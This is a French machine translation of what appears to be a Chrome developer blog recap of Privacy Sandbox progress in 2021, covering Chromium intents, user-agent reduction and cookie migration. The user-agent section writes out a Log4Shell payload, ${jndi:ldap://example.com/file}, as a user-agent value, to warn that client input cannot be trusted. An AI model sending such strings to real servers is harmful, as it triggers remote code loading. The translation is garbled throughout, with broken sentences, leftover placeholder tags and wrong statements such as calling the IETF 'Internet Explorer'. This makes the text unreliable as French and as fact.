Progression dans la Privacy Sandbox (décembre 2021)

Bienvenue dans l'édition 2021 récapitulative des progrès en matière de confidentialité le bac à sable, le suivi des jalons la voie de la suppression progressive des cookies tiers dans Chrome et la mise en œuvre d'une sur le Web privé. En temps normal, nous partageons un aperçu des nouveautés de la Privacy Sandbox. chronologie, ainsi que les actualités le projet, mais décembre était un mois calme. Au lieu de cela, nous reviendrons sur certaines activités en 2021 et vous proposer quelques solutions potentielles à prendre nous sommes dans la nouvelle année.

Processus de développement Chromium

Pour qu'une nouvelle fonctionnalité de la plate-forme Web arrive dans Chromium, elle doit passer par de développement ouvert d'un projet processus. En 2021, L'équipe Privacy Sandbox a produit les résultats suivants:

🥚Intention de prototypage 19
🧪Intention de test7.
🚀Intention d'expédition 11
<ph type="x-smartling-placeholder">
</ph> Source
.

Chaque étape représente également une invitation pour l'ensemble de l'écosystème Web à apporter sa contribution.

Un intent de prototypage est le premier point de contrôle, lors duquel nous invitons la discussion et les premiers tests. Cela signifie qu'une proposition sera disponible sur GitHub, qui vous permet de poser une question en créant un problème ou de participer à des discussions et des présentations dans les normes des groupes tels que le W3C et IETF (Internet Explorer). C'est également là que commence le codage. Vous pouvez donc vous attendre fonctionnalité de prototype à mettre à la disposition des développeurs pour qu'ils les testent derrière un fonctionnalité . Les premiers commentaires sont essentiels pour valider et itérer les propositions.

L'intention de test est facultative si nous voulons la phase d'évaluation. Les développeurs peuvent s'inscrire pour l'origine d'un essai d'une fonctionnalité, puis de la tester en production. On parle de test, car certains aspects spécifiques de la caractéristique à valider dans des environnements réels. Les développeurs qui peuvent tester et partager les résultats de ces tests fournir de précieux commentaires pour permettre d'itérer et faire évoluer la fonctionnalité.

L'intention de livraison est le dernier jalon qui indique qu'une fonctionnalité est désormais complètes et prêtes à passer en disponibilité générale. Une fois approuvée, la fonctionnalité est fusionnée dans une version à venir, puis passe par les phases Canary, Bêta, et stables. Il est essentiel de tester vos sites avec le Canary et les versions bêta de Chrome pour détecter Signalez tout bug avant qu'une fonctionnalité ne devienne stable.

Propositions

Chaque proposition de la Privacy Sandbox est associée à un dépôt GitHub. A de base de données héberge une vidéo explicative qui résume la fonctionnalité globale, une description détaillée pour l'implémentation par les navigateurs et les contributions de l'ensemble de l'écosystème Web sous la forme de "Problèmes" et de "Demandes d'extraction".

Voici ce que nous avons obtenu sur 14 dépôts Privacy Sandbox:

💬545Problèmes créés
250Problèmes fermés
🛠️261Demandes d'extraction créées
223Demandes d'extraction fusionnées
<ph type="x-smartling-placeholder">
</ph> Source
.

Le langage utilisé dans les explications et les spécifications est souvent destiné à une audience déjà familiarisé avec les normes et le développement de navigateurs, difficile si vous n’êtes pas familier avec cela. Cependant, l'objectif d'une explication est de expliquer ! Si certains points ne sont pas clairs ou ne sont pas abordés, nous souhaitons que vous signaler un problème afin que nous puissions mettre à jour et clarifier la description.

Résolutions

Nettoyage du ressort de l'user-agent

Alors que nous comptabilisons jusqu'à jusqu'à la nouvelle année, nous comptons jusqu'à jusqu'à Chrome 100 et la réduction incrémentielle de la chaîne du user-agent. C'est une bonne de réutilisation de la chaîne user-agent dans votre code afin de vérifier il est affecté par l'un ou l'autre de ces changements.

Pour trouver ces zones:

  1. Recherchez navigator.userAgent dans votre code JavaScript ou accédez à User-Agent dans votre code de serveur.
  2. Vérifiez l'analyse de la chaîne pour identifier les hypothèses concernant une version à deux chiffres. Pour exemple, une expression régulière spécifiant \d\d ou \d{2} doit être remplacée par \d+
  3. Vérifiez que vous utilisez la chaîne partout où vous comptez: <ph type="x-smartling-placeholder">
      </ph>
    • Version de la plate-forme (système d'exploitation)
    • version complète de Chrome
    • nom de l'appareil mobile
  4. Ce sont les valeurs qui seront réduites à des chaînes fixes à l'avenir. Si avez besoin d'accéder à ces valeurs, migrez vers le client User-Agent Conseils.

Il y a une mise à jour de décembre à mentionner si vous adoptez le client user-agent Hints : nous avons envoyé l'intention de livraisonpour permettre la délégation de la procédure à d'autres origines HTML via une balise <meta>. Exemple :

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

Si votre humeur pour le nettoyage de printemps est enthousiaste, vous pouvez également envisager des alternatives à l'utilisation du user-agent. Si vous utilisez la chaîne pour détecter les appareils mobiles, puis déterminez s'il est possible de les remplacer par des conception. Si vous vérifiez la compatibilité du nom et de la version du navigateur avec la fonctionnalité, consultez si vous pouvez utiliser la détection de caractéristiques à la place.

Il est important de se rappeler que le user-agent, comme tout client fourni ne sont ni exactes, ni même fournies. La récente version de Log4j faille : "Log4shell" fournit un exemple de ce risque. Un client qui définit sa chaîne user-agent sur d'inclure une valeur comme ${jndi:ldap://example.com/file} pourra peut-être obtenir un site pour l'analyser activement sur le serveur.

Une autre activité traditionnelle du Nouvel An consiste à s’assurer que vous êtes heureux d’avoir un nombre sain de cookies avec des ingrédients de qualité. Alors que nous poursuivons à l'abandon progressif des cookies tiers, vous devez les cookies de votre site qui seront concernés. 2020 a pris une longueur d'avance, car devenait nécessaire pour marquer tous les cookies utiliser avec SameSite=None.

Tous les cookies pour lesquels vous avez défini l'attribut SameSite sur None doivent disposer d'un mise à jour.

Trois options s'offrent à vous pour le moment:

  1. Si le cookie n'est requis que dans une relation 1:1 avec le site de premier niveau, suivez l'avancement des CHIPS proposition. Cela implique d'ajouter Partitioned au cookie.
  2. Si le cookie est utilisé dans un contexte intersites, mais uniquement entre les sites sur lesquels vous détenu et géré, il peut alors être candidat au statut de partenariat Ensembles. Pour cela, vous devez définir de l'ensemble et ajouter l'attribut SameParty au cookie.
  3. Si le cookie est utilisé pour fournir une forme de valeur partagée entre plusieurs de la Privacy Sandbox, examinez les possibilités offertes par la Privacy Sandbox des propositions pour proposer une solution alternative grâce au suivi intersites.

Si vous vous sentez particulièrement soucieux de votre santé, c'est aussi le moment idéal de revoir l'ensemble de votre utilisation des cookies, car nous avons une bonne recette pour améliorer votre les cookies propriétaires.

Commentaires

Au fur et à mesure que nous publions ces mises à jour mensuelles, Privacy Sandbox dans son ensemble, nous voulons nous assurer que les développeurs reçoivent les informations et le soutien dont ils ont besoin. Contactez-nous sur @ChromiumDev sur Twitter. améliorer dans cette série. Vos réponses nous permettront de continuer à améliorer le format.

Consultez les questions fréquentes sur la Privacy Sandbox, continue à s'étoffer en fonction des problèmes que vous envoyez à l'assistance pour les développeurs dans Cloud Storage. Si vous si vous avez des questions sur les tests ou la mise en œuvre de l'une des propositions, venez nous en parler.